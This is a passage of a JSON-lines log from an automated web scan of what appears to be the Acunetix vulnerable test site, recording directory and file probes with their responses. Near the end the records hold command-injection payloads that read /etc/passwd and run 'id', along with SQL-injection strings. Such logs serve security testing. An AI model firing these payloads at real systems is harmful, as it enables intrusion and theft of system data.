Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.%D0%92\",\"time\":\"352.197005ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:23.91077142Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.The\",\"input\":\"http://testphp.vulnweb.com/.The\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.The\",\"time\":\"360.448516ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.083784729Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/\",\"input\":\"http://testphp.vulnweb.com/.idea/\",\"title\":\"Index of /.idea/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/\",\"time\":\"344.050241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":427,\"lines\":14,\"status_code\":200,\"content_length\":951,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.142550338Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"input\":\"http://testphp.vulnweb.com/.idea/.name\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/.name\",\"time\":\"353.531438ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":6,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.283883486Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/acuart.iml\",\"input\":\"http://testphp.vulnweb.com/.idea/acuart.iml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/acuart.iml\",\"time\":\"338.660759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":29,\"lines\":10,\"status_code\":200,\"content_length\":292,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.326472975Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/art.iml\",\"input\":\"http://testphp.vulnweb.com/.idea/art.iml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/art.iml\",\"time\":\"356.720314ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.369080581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/encodings.xml\",\"input\":\"http://testphp.vulnweb.com/.idea/encodings.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/encodings.xml\",\"time\":\"343.933892ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":10,\"lines\":6,\"status_code\":200,\"content_length\":171,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.455338685Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/misc.xml\",\"input\":\"http://testphp.vulnweb.com/.idea/misc.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/misc.xml\",\"time\":\"351.917356ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":18,\"lines\":9,\"status_code\":200,\"content_length\":266,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.49184585Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/modules.xml\",\"input\":\"http://testphp.vulnweb.com/.idea/modules.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/modules.xml\",\"time\":\"346.856439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":26,\"lines\":10,\"status_code\":200,\"content_length\":275,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.530785798Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/scopes/\",\"input\":\"http://testphp.vulnweb.com/.idea/scopes/\",\"title\":\"Index of /.idea/scopes/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/scopes/\",\"time\":\"356.609997ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":58,\"lines\":8,\"status_code\":200,\"content_length\":284,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.799735564Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml\",\"input\":\"http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/scopes/scope_settings.xml\",\"time\":\"343.406048ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":13,\"lines\":5,\"status_code\":200,\"content_length\":143,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.865722534Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/vcs.xml\",\"input\":\"http://testphp.vulnweb.com/.idea/vcs.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/vcs.xml\",\"time\":\"338.645211ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":16,\"lines\":8,\"status_code\":200,\"content_length\":173,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:24.935555332Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/workspac\",\"input\":\"http://testphp.vulnweb.com/.idea/workspac\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspac\",\"time\":\"340.301255ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:25.08865476Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/workspace.xml\",\"input\":\"http://testphp.vulnweb.com/.idea/workspace.xml\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspace.xml\",\"time\":\"351.03149ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1702,\"lines\":217,\"status_code\":200,\"content_length\":12473,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:28.474740601Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01\",\"input\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspace.xmlA01\",\"time\":\"340.388446ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:28.550374456Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.as\",\"input\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.as\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.as\",\"time\":\"357.949655ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:28.682701814Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.aspx\",\"input\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.aspx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.aspx\",\"time\":\"351.685533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.297336505Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.aspxA05\",\"input\":\"http://testphp.vulnweb.com/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.aspxA05\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.idea/workspace.xmlA01http://testphp.vulnweb.com/07JxLCs2OM.aspxA05\",\"time\":\"344.364415ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.310925467Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.well-known/assetlinks.json\",\"input\":\"http://testphp.vulnweb.com/.well-known/assetlinks.json\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.well-known/assetlinks.json\",\"time\":\"348.095446ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.312160803Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.well-known/ai-plugin.json\",\"input\":\"http://testphp.vulnweb.com/.well-known/ai-plugin.json\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.well-known/ai-plugin.json\",\"time\":\"354.640818ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.315786453Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.well-known/gpc.json\",\"input\":\"http://testphp.vulnweb.com/.well-known/gpc.json\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.well-known/gpc.json\",\"time\":\"339.775224ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.333211749Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.well-known/dnt-policy.txt\",\"input\":\"http://testphp.vulnweb.com/.well-known/dnt-policy.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.well-known/dnt-policy.txt\",\"time\":\"358.045609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.344794885Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/.well-known/trust.txt\",\"input\":\"http://testphp.vulnweb.com/.well-known/trust.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/.well-known/trust.txt\",\"time\":\"343.516585ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.349245844Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/07JxLCs2OM.as\",\"input\":\"http://testphp.vulnweb.com/07JxLCs2OM.as\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/07JxLCs2OM.as\",\"time\":\"344.045835ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.365011045Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspx\",\"input\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/07JxLCs2OM.aspx\",\"time\":\"338.524103ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.374696563Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspxA05\",\"input\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspxA05\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/07JxLCs2OM.aspxA05\",\"time\":\"340.013164ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:29.400621404Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspxA05http://testphp.vulnweb.com/AJAX/\",\"input\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspxA05http://testphp.vulnweb.com/AJAX/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/07JxLCs2OM.aspxA05http://testphp.vulnweb.com/AJAX/\",\"time\":\"352.24965ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:33.24897207Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspxA05http://testphp.vulnweb.com/AJAX/A01\",\"input\":\"http://testphp.vulnweb.com/07JxLCs2OM.aspxA05http://testphp.vulnweb.com/AJAX/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/07JxLCs2OM.aspxA05http://testphp.vulnweb.com/AJAX/A01\",\"time\":\"356.944112ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:33.269054293Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/11H\",\"input\":\"http://testphp.vulnweb.com/11H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/11H\",\"time\":\"351.606749ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:33.2732325Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/143\",\"input\":\"http://testphp.vulnweb.com/143\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/143\",\"time\":\"350.597487ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.262289562Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/404.php\",\"input\":\"http://testphp.vulnweb.com/404.php\",\"title\":\"Your requested document was not found!\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/404.php\",\"time\":\"353.189444ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":529,\"lines\":112,\"status_code\":200,\"content_length\":5270,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.26701295Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%2F\",\"input\":\"http://testphp.vulnweb.com/?%2F\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%2F\",\"time\":\"343.437259ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.444621823Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fcmd=exec(%27cat%20%2Fetc%2Fpasswd%27)\",\"input\":\"http://testphp.vulnweb.com/?%3Fcmd=exec(%27cat%20%2Fetc%2Fpasswd%27)\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fcmd=exec(%27cat%20%2Fetc%2Fpasswd%27)\",\"time\":\"347.884429ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.507660264Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fcmd=exec(%27id%27)\",\"input\":\"http://testphp.vulnweb.com/?%3Fcmd=exec(%27id%27)\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fcmd=exec(%27id%27)\",\"time\":\"345.964718ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.642313594Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fcmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)\",\"input\":\"http://testphp.vulnweb.com/?%3Fcmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fcmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)\",\"time\":\"341.168055ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.690037903Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fid=1\",\"input\":\"http://testphp.vulnweb.com/?%3Fid=1\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fid=1\",\"time\":\"343.736743ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.73023709Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fid=1%20--\",\"input\":\"http://testphp.vulnweb.com/?%3Fid=1%20--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fid=1%20--\",\"time\":\"343.409605ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.820183727Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fid=1%20OR%201=1--\",\"input\":\"http://testphp.vulnweb.com/?%3Fid=1%20OR%201=1--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fid=1%20OR%201=1--\",\"time\":\"352.953323ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.856636699Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fid=1%27%20AND%201=1--%20AND%20IFNULL(1,2)=2--\",\"input\":\"http://testphp.vulnweb.com/?%3Fid=1%27%20AND%201=1--%20AND%20IFNULL(1,2)=2--\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fid=1%27%20AND%201=1--%20AND%20IFNULL(1,2)=2--\",\"time\":\"347.698981ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:34.897007517Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?%3Fid=1%2F%2A!50000AND%2A%2F1=2\",\"input\":\"http://testphp.vulnweb.com/?%3Fid=1%2F%2A!50000AND%2A%2F1=2\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/?%3Fid=1%2F%2A!50000AND%2A%2F1=2\",\"time\":\"354.850587ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:20:35.16281526Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/?cmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)\",\"input\":\"http://testphp.vulnweb.com/?cmd=shell_exec(%27cat%20%2Fetc%2Fissue%27)\",\"title\":\"Home of Acunetix 